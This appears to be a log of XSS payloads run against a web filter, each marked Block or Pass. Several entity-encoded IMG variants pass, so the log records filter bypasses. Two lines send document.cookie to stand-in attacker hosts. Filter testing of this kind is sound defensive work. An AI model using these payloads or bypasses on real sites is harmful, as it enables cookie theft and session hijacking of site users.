"><script>" => Block
<script>alert("WXSS")</script> => Block
<<script>alert("WXSS");//<</script> => Block
<script>alert(document.cookie)</script> => Block
'><script>alert(document.cookie)</script> => Block
'><script>alert(document.cookie);</script> => Block
\";alert('XSS');// => Block
%3cscript%3ealert("WXSS");%3c/script%3e => Block
%3cscript%3ealert(document.cookie);%3c%2fscript%3e => Block
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E => Block
&ltscript&gtalert(document.cookie);</script> => Block
&ltscript&gtalert(document.cookie);&ltscript&gtalert => Block
<xss><script>alert('WXSS')</script></vulnerable> => Block
<IMG%20SRC='javascript:alert(document.cookie)'> => Block
<IMG%20SRC="javascript:alert('WXSS');"> => Block
<IMG%20SRC="javascript:alert('WXSS')" => Block
<IMG%20SRC=javascript:alert('WXSS')> => Block
<IMG%20SRC=JaVaScRiPt:alert('WXSS')> => Block
<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)> => Block
<IMG%20SRC=`javascript:alert("'WXSS'")`> => Block
<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>"> => Block
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))> => Block
<IMG%20SRC='javasc	ript:alert(document.cookie)'> => Block
<IMG%20SRC="jav	ascript:alert('WXSS');"> => Block
<IMG%20SRC="jav&#x09;ascript:alert('WXSS');"> => Pass
<IMG%20SRC="jav&#x0A;ascript:alert('WXSS');"> => Pass
<IMG%20SRC="jav&#x0D;ascript:alert('WXSS');"> => Pass
<IMG%20SRC="%20&#14;%20javascript:alert('WXSS');"> => Pass
<IMG%20DYNSRC="javascript:alert('WXSS')"> => Block
<IMG%20LOWSRC="javascript:alert('WXSS')"> => Block
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> => Block
<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> => Pass
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> => Pass
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> => Pass
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E => Block
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script> => Block
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E => Block
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} => Block
'';!--"<XSS>=&{()} => Block
